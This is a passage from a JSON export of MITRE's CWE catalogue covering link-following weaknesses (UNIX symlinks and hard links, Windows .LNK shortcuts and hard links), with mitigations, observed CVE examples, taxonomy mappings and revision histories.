files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1603"},{"Reference":"CVE-2004-1901","Description":"Package listing system allows local users to overwrite arbitrary files via a hard link attack on the lockfiles.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1901"},{"Reference":"CVE-2005-1111","Description":"Hard link race condition","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1111"},{"Reference":"CVE-2000-0342","Description":"Mail client allows remote attackers to bypass the user warning for executable attachments such as .exe, .com, and .bat by using a .lnk file that refers to the attachment, aka \\"Stealth Attachment.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0342"},{"Reference":"CVE-2001-1042","Description":"FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1042"},{"Reference":"CVE-2001-1043","Description":"FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1043"},{"Reference":"CVE-2005-0587","Description":"Browser allows remote malicious web sites to overwrite arbitrary files by tricking the user into downloading a .LNK (link) file twice, which overwrites the file that was referenced in the first .LNK file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0587"},{"Reference":"CVE-2001-1386","Description":"\\".LNK.\\" - .LNK with trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1386"},{"Reference":"CVE-2003-1233","Description":"Rootkits can bypass file access restrictions to Windows kernel directories using NtCreateSymbolicLinkObject function to create symbolic link","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1233"},{"Reference":"CVE-2002-0725","Description":"File system allows local attackers to hide file usage activities via a hard link to the target file, which causes the link to be recorded in the audit trail instead of the target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0725"},{"Reference":"CVE-2003-0844","Description":"Web server plugin allows local users to overwrite arbitrary files via a symlink attack on predictable temporary filenames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0844"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Link Following"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO02-C","Entry_Name":"Canonicalize path names originating from untrusted sources"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS01-C","Entry_Name":"Check for the existence of links when dealing with files"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"FIO01-PL","Entry_Name":"Do not operate on files that can be modified by untrusted users","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP18","Entry_Name":"Link in resource name resolution"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"132"}},{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"35"}},{"attr":{"@_CAPEC_ID":"76"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Symbolic Link Attacks&#34;, Page 518"}}},"Notes":{"Note":[{"attr":{"@_Type":"Relationship"},"xhtml:p":["Link following vulnerabilities are Multi-factor Vulnerabilities (MFV). They are the combination of multiple elements: file or directory permissions, filename predictability, race conditions, and in some cases, a design limitation in which there is no mechanism for performing atomic file creation operations.","Some potential factors are race conditions, permissions, and predictability."]},{"#text":"UNIX hard links, and Windows hard/soft links are under-studied and under-reported.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Background_Details, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Causal_Nature, Common_Consequences, Functional_Areas, Likelihood_of_Exploit, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Link Following","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Links Before File Access (aka \'Link Following\')","attr":{"@_Date":"2009-05-27"}}]}},"61":{"attr":{"@_ID":"61","@_Name":"UNIX Symbolic Link (Symlink) Following","@_Abstraction":"Compound","@_Structure":"Composite","@_Status":"Incomplete"},"Description":"The software, when opening a file or directory, does not sufficiently account for when the file is a symbolic link that resolves to a target outside of the intended control sphere. This could allow an attacker to cause the software to operate on unauthorized files.","Extended_Description":"A software system that allows UNIX symbolic links (symlink) as part of paths whether in internal code or through user input can allow an attacker to spoof the symbolic link and traverse the file system to unintended locations or access arbitrary files. The symbolic link can permit an attacker to read/write/corrupt a file that they originally did not have permissions to access.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"59","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"362","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"340","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"386","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"732","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Symlink following"},{"Term":"symlink vulnerability"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"These are typically reported for temporary files or privileged programs."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Symbolic link attacks often occur when a program creates a tmp directory that stores files/links. Access to the directory should be restricted to the program as to prevent attackers from manipulating the files."},{"attr":{"@_Mitigation_ID":"MIT-48.1"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Follow the principle of least privilege when assigning access rights to entities in a software system.","Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted."]}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1386","Description":"Some versions of Perl follows symbolic links when running with the -e option, which allows local users to overwrite arbitrary files via a symlink attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1386"},{"Reference":"CVE-2000-1178","Description":"Text editor follows symbolic links when creating a rescue copy during an abnormal exit, which allows local users to overwrite the files of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1178"},{"Reference":"CVE-2004-0217","Description":"Antivirus update allows local users to create or append to arbitrary files via a symlink attack on a logfile.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0217"},{"Reference":"CVE-2003-0517","Description":"Symlink attack allows local users to overwrite files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0517"},{"Reference":"CVE-2004-0689","Description":"Possible interesting example","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0689"},{"Reference":"CVE-2005-1879","Description":"Second-order symlink vulnerabilities","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1879"},{"Reference":"CVE-2005-1880","Description":"Second-order symlink vulnerabilities","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1880"},{"Reference":"CVE-2005-1916","Description":"Symlink in Python program","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1916"},{"Reference":"CVE-2000-0972","Description":"Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0972"},{"Reference":"CVE-2005-0824","Description":"Signal causes a dump that follows symlinks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0824"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"UNIX symbolic link following"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"27"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-493"}},{"attr":{"@_External_Reference_ID":"REF-494"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Symbolic Link Attacks&#34;, Page 518"}}]},"Notes":{"Note":{"attr":{"@_Type":"Research Gap"},"xhtml:p":["Symlink vulnerabilities are regularly found in C and shell programs, but all programming languages can have this problem. Even shell programs are probably under-reported.","\\"Second-order symlink vulnerabilities\\" may exist in programs that invoke other programs that follow symlinks. They are rarely reported but are likely to be fairly common when process invocation is used. Reference: [Christey2005]"]}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, Research_Gaps, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"62":{"attr":{"@_ID":"62","@_Name":"UNIX Hard Link","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software, when opening a file or directory, does not sufficiently account for when the name is associated with a hard link to a target that is outside of the intended control sphere. This could allow an attacker to cause the software to operate on unauthorized files.","Extended_Description":"Failure for a system to check for hard links can result in vulnerability to different types of attacks. For example, an attacker can escalate their privileges if a file used by a privileged program is replaced with a hard link to a sensitive file (e.g. /etc/passwd). When the process opens the file, the attacker can assume the privileges of that process.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"59","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Unix","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-48.1"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Follow the principle of least privilege when assigning access rights to entities in a software system.","Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted."]}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1494","Description":"Hard link attack, file overwrite; interesting because program checks against soft links","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1494"},{"Reference":"CVE-2002-0793","Description":"Hard link and possibly symbolic link following vulnerabilities in embedded operating system allow local users to overwrite arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0793"},{"Reference":"CVE-2003-0578","Description":"Server creates hard links and unlinks files as root, which allows local users to gain privileges by deleting and overwriting arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0578"},{"Reference":"CVE-1999-0783","Description":"Operating system allows local users to conduct a denial of service by creating a hard link from a device special file to a file on an NFS file system.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0783"},{"Reference":"CVE-2004-1603","Description":"Web hosting manager follows hard links, which allows local users to read or modify arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1603"},{"Reference":"CVE-2004-1901","Description":"Package listing system allows local users to overwrite arbitrary files via a hard link attack on the lockfiles.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1901"},{"Reference":"CVE-2005-0342","Description":"The Finder in Mac OS X and earlier allows local users to overwrite arbitrary files and gain privileges by creating a hard link from the .DS_Store file to an arbitrary file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0342"},{"Reference":"CVE-2005-1111","Description":"Hard link race condition","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1111"},{"Reference":"BUGTRAQ:20030203 ASA-0001","Description":"OpenBSD chpass/chfn/chsh file content leak","Link":"http://www.securityfocus.com/archive/1/309962"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"UNIX hard link"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO05-C","Entry_Name":"Identify files using multiple file attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP18","Entry_Name":"Link in resource name resolution"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Hard Links&#34;, Page 518"}}},"Notes":{"Note":{"#text":"Under-studied. It is likely that programs that check for symbolic links could be vulnerable to hard links.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"64":{"attr":{"@_ID":"64","@_Name":"Windows Shortcut Following (.LNK)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software, when opening a file or directory, does not sufficiently handle when the file is a Windows shortcut (.LNK) whose target is outside of the intended control sphere. This could allow an attacker to cause the software to operate on unauthorized files.","Extended_Description":"The shortcut (file with the .lnk extension) can permit an attacker to read/write a file that they originally did not have permissions to access.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"59","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Windows symbolic link following"},{"Term":"symlink"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-48.1"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Follow the principle of least privilege when assigning access rights to entities in a software system.","Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted."]}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0342","Description":"Mail client allows remote attackers to bypass the user warning for executable attachments such as .exe, .com, and .bat by using a .lnk file that refers to the attachment, aka \\"Stealth Attachment.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0342"},{"Reference":"CVE-2001-1042","Description":"FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1042"},{"Reference":"CVE-2001-1043","Description":"FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1043"},{"Reference":"CVE-2005-0587","Description":"Browser allows remote malicious web sites to overwrite arbitrary files by tricking the user into downloading a .LNK (link) file twice, which overwrites the file that was referenced in the first .LNK file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0587"},{"Reference":"CVE-2001-1386","Description":"\\".LNK.\\" - .LNK with trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1386"},{"Reference":"CVE-2003-1233","Description":"Rootkits can bypass file access restrictions to Windows kernel directories using NtCreateSymbolicLinkObject function to create symbolic link","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1233"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Windows Shortcut Following (.LNK)"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO05-C","Entry_Name":"Identify files using multiple file attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP18","Entry_Name":"Link in resource name resolution"}]},"Notes":{"Note":{"#text":"Under-studied. Windows .LNK files are more \\"portable\\" than Unix symlinks and have been used in remote exploits. Some Windows API\'s will access LNK\'s as if they are regular files, so one would expect that they would be reported more frequently.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"65":{"attr":{"@_ID":"65","@_Name":"Windows Hard Link","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software, when opening a file or directory, does not sufficiently handle when the name is associated with a hard link to a target that is outside of the intended control sphere. This could allow an attacker to cause the software to operate on unauthorized files.","Extended_Description":"Failure for a system to check for hard links can result in vulnerability to different types of attacks. For example, an attacker can escalate their privileges if a file used by a privileged program is replaced with a hard link to a sensitive file (e.g. AUTOEXEC.BAT). When the process opens the file, the attacker can assume the privileges of that process, or prevent the program from accurately processing data.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"59","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-48.1"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Follow the principle of least privilege when assigning access rights to entities in a software system.","Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted."]}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0725","Description":"File system allows local attackers to hide file usage activities via a hard link to the target file, which causes the link to be recorded in the audit trail instead of the target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0725"},{"Reference":"CVE-2003-0844","Description":"Web server plugin allows local users to overwrite arbitrary files via a symlink attack on predictable temporary filenames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0844"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Windows hard link"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO05-C","Entry_Name":"Identify files using multiple file attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP18","Entry_Name":"Link in resource name resolution"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, &#34;Links&#34;, Page 676"}}},"Notes":{"Note":{"#text":"Under-studied","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"66":{"attr":{"@_ID":"66","@_Name":"Improper Handling of File Names that Identify Virtual Resources","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not handle or incorrectly handles a file name that identifies a \\"virtual\\" resource that is not directly specified within the directory that is associated with the file name, causing the product to perform file-based operations on a resource that is not a file.","Extended_Description":"Virtual file names are represented like normal file names, but they are effectively aliases for other resources that do not behave like normal files. Depending on their functionality, they could be alternate 